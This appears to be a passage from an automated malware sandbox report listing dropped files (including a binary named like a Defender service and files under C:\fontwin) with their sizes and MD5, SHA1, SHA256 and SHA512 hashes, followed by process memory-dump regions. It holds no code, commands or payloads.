                                                                                                                                                                                  MD5

                                                                                                                                                                                  6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1jNuw3RpYi.bat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  162B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b9b591f42446e05441fc31dc74c0e597

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  68afdb88e363bf8a243339a3120570d795b21168

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  69fe87d8d867421ce4d719c1acd58f62d533872dd41043186d281c31c799f3b3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a9160a4dfb0147291eab863f538c7725be73849a8506b4b1e611d75c81374123ac1d23220cbf35d5cdd2cedada93b43ad27020d3f16d5e211118c07ddd0b2402

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.8MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5c218a3293314b8e13e89212d24e7da0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9ff5c504f253730e1d6a15ca1c655c3882ecfbae

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  aedfa77790fe7a60cffddc7dfd4afa0f6fdb858965df2850ce418b4428d92a99

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4985f19581a8fc670dde876199a1603fcb1ece427b8c0544b9cf369568fc81ee81a4e2f1a3cbf7160b87a8590917b9b4c8dc8268c5d3ce988c3a251ece047f44

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RESCFC3.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4820aa9f0cec293aa0b1f6893a16b463

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c3aeddacebdfcde4e820d699ee6dd3e031591ee8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  278dfb3b21c21fea9753652cbb875e28a2b8bbb23639f7473910e28f77917084

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  780078a20850ff839339c709517801b9f15bd3a86a9ca5ba3eec37da6abf399530da74be0fa535ee3cdcf2c098926221d150e3b66c1e15b4c97f26057e07a0be

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4xtr5sr.zrf.ps1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\twain32.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.7MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  de40bff13376524593bbf365ac4489f2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  19178234bd0e35a984ff183418fc2f39c48b4e8d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bafc17e2573f25344dbd7e27703f8e91b2abde15ac01a932bd3f12e686ab7952

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  957fcc33adead5af1e5919251976c863b519f3097f21d1abf909cea136fe0b8ad7e8c15696a409d212d471c3b4d899cd021e7194fbcc4c6445b220383653016b

                                                                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bdb25c22d14ec917e30faf353826c5de

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                                                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b42c70c1dbf0d1d477ec86902db9e986

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                                                                                                                                • C:\fontwin\MsServerHost.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.9MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6a720688eb9d2f5c2cfd4761f969063b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5ee46b7fd8f41c79e3df31feede20c518307d52a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7be4d5853d99295ba22450e935a9ab99861cfbe5ecc56dab500161c5fa6a8d8b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8a9bee8056817fdd26f41202ceae21c4dd720b20de699f28ec6dbbf70ad6566f4ed394d34cbe640374cf970ccb4f4746fe416f2c7bdec19864305c9878d489c0

                                                                                                                                                                                • C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  79B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  06def1a66d18e2cb54c3feb3e338e852

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  deea78d6baf993c87a4be23895c0ac97be3a58e5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  050561c2a9a611410c1194e5dea95982410c21c13e6a1b55d0df5c19fb4d3d2f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a3769d9af6fdf50c8a86707cf6ced77673e7c7d0471c8102777adf5a556e9ee1598941596fd6acd198c84e7900205a67503209e95e9a4f8ea7f139014e8ba93f

                                                                                                                                                                                • C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  238B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c40860c6355fad694d0759ae23dd3439

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  eb61967cd1502160c1e2e219690cf0b7f91cc94e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b4c7379240810d664b2bdd60e093b4203134eff9c42de2720b0cd287af1d74ca

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ca5323cf17932235cce0c83bc82efa25dd88c0c181b1cddc82149690531d26a0c948ec4d33435ccdf95cc1884efe163703df878ecc30ccc90ecd85083d4d4dfc

                                                                                                                                                                                • C:\windows\system32\kpkopw.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4fd88d9a65c52ad5f6dd8cf9e335a78b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3d92716e2dabd6046d9d26a17d4d1eefb3899c69

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0cbc3a44553ec39f4ec45e8aa0f729c0ecb908d926f78e11002625366a39f592

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f1740ad48d065fcb678837b9e38aa1a6afcf5181a8f987b8ec3680dfe1fa19c43c4f79a9f5988054a86dde7ed81baae81e096a246c4a03398f8c3e001dca5501

                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\lsdwy4t1\lsdwy4t1.0.cs

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  369B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  95c6a0f1c5993670e4a38f7e19c0733f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  66c6b5fb05c3ca836511874825f0600b248c8ccb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  44845eeb3994d38845313dd65d88a0f3d6798020c73aa054f07d8d52e3891979

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4ec6ed8be0c7cdc0f55e0a5fe4d60477a1e8885b4b631c857835f99702820bf54c5976f48b19da4a83f085b1acb113c3aa3ce56b9cb8de1be348d84eec44d00a

                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\lsdwy4t1\lsdwy4t1.cmdline

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  235B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c032afe5d5e5d40bab2cdbd9c839c4de

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  188231dada45f143e2c24da5c52e8437a42cbe79

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5c51a5519f3245de8de5a8ea11133cc463b7c31c50b1bf4d8a270c8f0dc49e7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5d3f0355d7de3c7522bd3eea1cbe18d6a201dab36fc931b7c0b135cf7717ad684b0d3069b5fff488d6933dc093b0feddf8993b5d8982d8651be6e08afc79f1a6

                                                                                                                                                                                • \??\c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7bbfaf1199741b237d2493615c95c6d7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  86d466217c4dc1e0808f83ceda8f4b4df948b5dc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e20e4619dbc932a216fd93f86fe0af2e915f4c2ba6177fc3581da59885094476

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2eda9bf71dc4a4583b7b8e9a6aab0f91d98cca68ee4309df1a4d26541917678da09a15d712397ae4b95fe95b65c8aa6eeab94d7620a5546b3df6c00306ef4a5c

                                                                                                                                                                                • memory/64-65-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/64-64-0x000001F4E0230000-0x000001F4E0257000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/448-72-0x00000130F5D40000-0x00000130F5D67000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/448-73-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/596-57-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/596-54-0x0000022CBE720000-0x0000022CBE741000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  132KB

                                                                                                                                                                                • memory/596-56-0x0000022CBE750000-0x0000022CBE777000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/672-60-0x00000122E7F00000-0x00000122E7F27000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/672-62-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/952-68-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/952-67-0x000002866E9C0000-0x000002866E9E7000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1028-91-0x000002B164340000-0x000002B164367000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1028-92-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1044-80-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1044-79-0x000002501E760000-0x000002501E787000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1052-83-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1052-82-0x00000241A8340000-0x00000241A8367000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1184-86-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1184-85-0x00000210C97C0000-0x00000210C97E7000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1196-89-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1196-88-0x000001628F030000-0x000001628F057000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1228-41-0x00007FFB9F2B0000-0x00007FFB9F4A5000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.0MB

                                                                                                                                                                                • memory/1228-42-0x00007FFB9ED60000-0x00007FFB9EE1E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  760KB

                                                                                                                                                                                • memory/1320-96-0x000001CC2D080000-0x000001CC2D0A7000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1320-97-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1328-100-0x00007FFB5F330000-0x00007FFB5F340000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1328-99-0x0000026387E60000-0x0000026387E87000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  156KB

                                                                                                                                                                                • memory/1660-618-0x000000001BD10000-0x000000001BD1E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/1660-610-0x000000001BD40000-0x000000001BD90000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  320KB

                                                                                                                                                                                • memory/1660-616-0x0000000001940000-0x000000000194C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                • memory/1660-614-0x0000000001930000-0x000000000193E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/1660-612-0x000000001BCF0000-0x000000001BD08000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  96KB

                                                                                                                                                                                • memory/1660-609-0x0000000001950000-0x000000000196C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/1660-607-0x00000000018E0000-0x00000000018EE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/1660-601-0x0000000000E50000-0x0000000001048000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.0MB

                                                                                                                                                                                • memory/1660-620-0x000000001BD20000-0x000000001BD2C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                • memory/4036-33-0x0000022F69FC0000-0x0000022F69FE2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  136KB

                                                                                                                                                                                • memory/4756-358-0x000001D9DC3E0000-0x000001D9DC3E6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                • memory/4756-356-0x000001D9DC400000-0x000001D9DC41A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/4756-355-0x000001D9DC3A0000-0x000001D9DC3AA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4756-354-0x000001D9DC3C0000-0x000001D9DC3DC000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/4756-353-0x000001D9DC250000-0x000001D9DC25A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4756-352-0x000001D9DC190000-0x000001D9DC245000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  724KB

                                                                                                                                                                                • memory/4756-351-0x000001D9DC170000-0x000001D9DC18C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/4756-357-0x000001D9DC3B0000-0x000001D9DC3B8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/4756-359-0x000001D9DC3F0000-0x000001D9DC3FA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB